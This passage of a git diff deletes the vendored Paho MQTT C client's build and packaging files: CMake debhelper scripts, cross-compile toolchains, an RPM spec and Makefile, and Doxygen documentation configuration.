-foreach( _F ${DH_GENERATED_CONTROL_EXTRA} )
-    set( CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
-            ${CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA} 
-            ${CMAKE_CURRENT_BINARY_DIR}/${CPACK_DEBIAN_PACKAGE_NAME}/DEBIAN/${_F}
-            CACHE INTERNAL ""
-    )
-endforeach()
-
-# This will copy the generated dhhelper-files to our to-be-cpacked-directory.
-# CPACK_INSTALL_SCRIPT must be set to the value of CPACK_DEBIAN_INSTALL_SCRIPT in the file
-# pointed to by CPACK_PROJECT_CONFIG_FILE.
-set( CPACK_DEBIAN_INSTALL_SCRIPT ${CMAKE_CURRENT_LIST_DIR}/CMakeDebHelperInstall.cmake CACHE INTERNAL "" )
diff --git a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake b/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake
deleted file mode 100644
index 7e61b32..0000000
--- a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake
+++ /dev/null
@@ -1,17 +0,0 @@
-# This script is used internally by CMakeDebHelper.
-# It is run at CPack-Time and copies the files generated by the debhelpers to the right place.
-
-if( NOT CPACK_DEBIAN_PACKAGE_NAME )
-    string( TOLOWER "${CPACK_PACKAGE_NAME}" CPACK_DEBIAN_PACKAGE_NAME )
-endif()
-
-# Copy all generated files where the packing will happen,
-# exclude the DEBIAN-directory.
-
-MESSAGE(STATUS "CPACK_OUTPUT_FILE_PREFIX: " "${CPACK_OUTPUT_FILE_PREFIX}/debian/${CPACK_DEBIAN_PACKAGE_NAME}/")
-
-file( COPY
-    "${CPACK_OUTPUT_FILE_PREFIX}/debian/${CPACK_DEBIAN_PACKAGE_NAME}/"
-    DESTINATION "${CMAKE_CURRENT_BINARY_DIR}" 
-    PATTERN DEBIAN EXCLUDE
-)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake
deleted file mode 100644
index 4965ff7..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake
+++ /dev/null
@@ -1,10 +0,0 @@
-# path to compiler and utilities
-# specify the cross compiler
-SET(CMAKE_C_COMPILER arm-linux-gnueabihf-gcc)
-
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Linux)
-SET(CMAKE_SYSTEM_PROCESSOR arm)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake
deleted file mode 100644
index 05e7254..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake
+++ /dev/null
@@ -1,15 +0,0 @@
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Windows)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
-
-# specify the cross compiler
-SET(CMAKE_C_COMPILER i686-w64-mingw32-gcc)
-SET(CMAKE_CXX_COMPILER i686-w64-mingw32-g++)
-SET(CMAKE_RC_COMPILER_ENV_VAR "RC")
-SET(CMAKE_RC_COMPILER "")
-SET(CMAKE_SHARED_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
-SET(CMAKE_EXE_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake
deleted file mode 100644
index 98afef1..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake
+++ /dev/null
@@ -1,15 +0,0 @@
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Windows)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
-
-# specify the cross compiler
-SET(CMAKE_C_COMPILER x86_64-w64-mingw32-gcc)
-SET(CMAKE_CXX_COMPILER x86_64-w64-mingw32-g++)
-SET(CMAKE_RC_COMPILER_ENV_VAR "RC")
-SET(CMAKE_RC_COMPILER "")
-SET(CMAKE_SHARED_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
-SET(CMAKE_EXE_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
diff --git a/thirdparty/paho.mqtt.c/debian/CMakeLists.txt b/thirdparty/paho.mqtt.c/debian/CMakeLists.txt
deleted file mode 100644
index 7b315b8..0000000
--- a/thirdparty/paho.mqtt.c/debian/CMakeLists.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-# These files (generated by dhelpers) will be copied into the control-part of the deb.
-# Files that end up in the filesystem normally (e.g. cron/init-scripts) must not be mentioned here.
-# It's a good idea to add "conffiles", as the debhelpers may generate it.
-set( DH_GENERATED_CONTROL_EXTRA
-    preinst
-        postinst
-        postrm
-        prerm
-        conffiles
-)
-
-# At this point, CMakeDebHelper must be included (add .cmake if you have it in this directory)
-
-include( CMakeDebHelper )
-
-# CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA and CPACK_INSTALL_SCRIPT are set now, don't modify them!
diff --git a/thirdparty/paho.mqtt.c/dist/Makefile b/thirdparty/paho.mqtt.c/dist/Makefile
deleted file mode 100644
index 88d9c3d..0000000
--- a/thirdparty/paho.mqtt.c/dist/Makefile
+++ /dev/null
@@ -1,11 +0,0 @@
-VERSION=1.2.0
-
-check:
-	rpmlint -i dist/paho-c.spec
-
-rpm-prep:
-	mkdir -p ${HOME}/rpmbuild/SOURCES/
-	tar --transform="s/\./paho-c-${VERSION}/" -cf ${HOME}/rpmbuild/SOURCES/v${VERSION}.tar.gz --exclude=./build.paho --exclude=.git --exclude=*.bz ./ --gzip
-
-rpm: rpm-prep
-	rpmbuild -ba dist/paho-c.spec
diff --git a/thirdparty/paho.mqtt.c/dist/paho-c.spec b/thirdparty/paho.mqtt.c/dist/paho-c.spec
deleted file mode 100644
index 9314349..0000000
--- a/thirdparty/paho.mqtt.c/dist/paho-c.spec
+++ /dev/null
@@ -1,78 +0,0 @@
-Summary:            MQTT C Client
-Name:               paho-c
-Version:            1.2.0
-Release:            3%{?dist}
-License:            Eclipse Distribution License 1.0 and Eclipse Public License 1.0
-Group:              Development/Tools
-Source:             https://github.com/eclipse/paho.mqtt.c/archive/v%{version}.tar.gz
-URL:                https://eclipse.org/paho/clients/c/
-BuildRequires:      cmake
-BuildRequires:      gcc
-BuildRequires:      graphviz
-BuildRequires:      doxygen
-BuildRequires:      openssl-devel
-Requires:           openssl
-
-
-%description
-The Paho MQTT C Client is a fully fledged MQTT client written in ANSI standard C.
-
-
-%package devel
-Summary:            MQTT C Client development kit
-Group:              Development/Libraries
-Requires:           paho-c
-
-%description devel
-Development files and samples for the the Paho MQTT C Client.
-
-
-%package devel-docs
-Summary:            MQTT C Client development kit documentation
-Group:              Development/Libraries
-
-%description devel-docs
-Development documentation files for the the Paho MQTT C Client.
-
-%prep
-%autosetup -n paho-c-%{version}
-
-%build
-mkdir build.paho && cd build.paho
-%cmake -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DPAHO_BUILD_SAMPLES=TRUE ..
-make %{?_smp_mflags}
-
-%install
-cd build.paho
-make install DESTDIR=%{buildroot}
-
-%files
-%doc edl-v10 epl-v10
-%{_libdir}/*
-
-%files devel
-%{_bindir}/*
-%{_includedir}/*
-
-%files devel-docs
-%{_datadir}/*
-
-%changelog
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-4
-- Enabled generation of debuginfo package
-
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-3
-- Fixed changelog issues pointed by rpmlint
-
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-2
-- Updated changelog to comply with Fedora packaging guidelines
-
-* Wed Jul 26 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-1
-- Fixed rpmlint warnings: replaced cmake call with builtin macro
-- Fixed rpmlint warnings: removed buildroot reference from build section
-
-* Fri Jun 30 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0
-- Updated package to version 1.2.0
-
-* Sat Dec 31 2016 Otavio R. Piske <opiske@redhat.com> - 1.1.0
-- Initial packaging
diff --git a/thirdparty/paho.mqtt.c/doc/CMakeLists.txt b/thirdparty/paho.mqtt.c/doc/CMakeLists.txt
deleted file mode 100644
index 06e4c5d..0000000
--- a/thirdparty/paho.mqtt.c/doc/CMakeLists.txt
+++ /dev/null
@@ -1,40 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015 logi.cals GmbH
-# 
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution. 
-# 
-#  The Eclipse Public License is available at 
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at 
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-# 
-#  Contributors:
-#     Rainer Poisel - initial version
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-### documentation settings
-FIND_PACKAGE(Doxygen)
-IF(NOT DOXYGEN_FOUND)
-    message(FATAL_ERROR "Doxygen is needed to build the documentation.")
-ENDIF()
-SET(DOXYTARGETS)
-FILE(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/doc)
-FOREACH(DOXYFILE_SRC DoxyfileV3ClientAPI;DoxyfileV3AsyncAPI;DoxyfileV3ClientInternal)
-    SET(DOXYFILE_IN ${DOXYFILE_SRC}.in)
-    SET(DOXYFILE ${CMAKE_CURRENT_BINARY_DIR}/${DOXYFILE_SRC})
-
-    CONFIGURE_FILE(${DOXYFILE_IN} ${DOXYFILE} @ONLY)
-    ADD_CUSTOM_TARGET(${DOXYFILE_SRC}.target
-        COMMAND ${DOXYGEN_EXECUTABLE} ${DOXYFILE}
-            WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}
-            COMMENT "Generating API documentation with Doxygen"
-            VERBATIM
-    )
-    SET(DOXYTARGETS ${DOXYTARGETS} ${DOXYFILE_SRC}.target)
-ENDFOREACH(DOXYFILE_SRC)
-ADD_CUSTOM_TARGET(doc ALL DEPENDS ${DOXYTARGETS})
-INSTALL(DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/doc DESTINATION share)
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI b/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI
deleted file mode 100644
index 91aea10..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI
+++ /dev/null
@@ -1,1803 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho Asynchronous MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTAsync/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
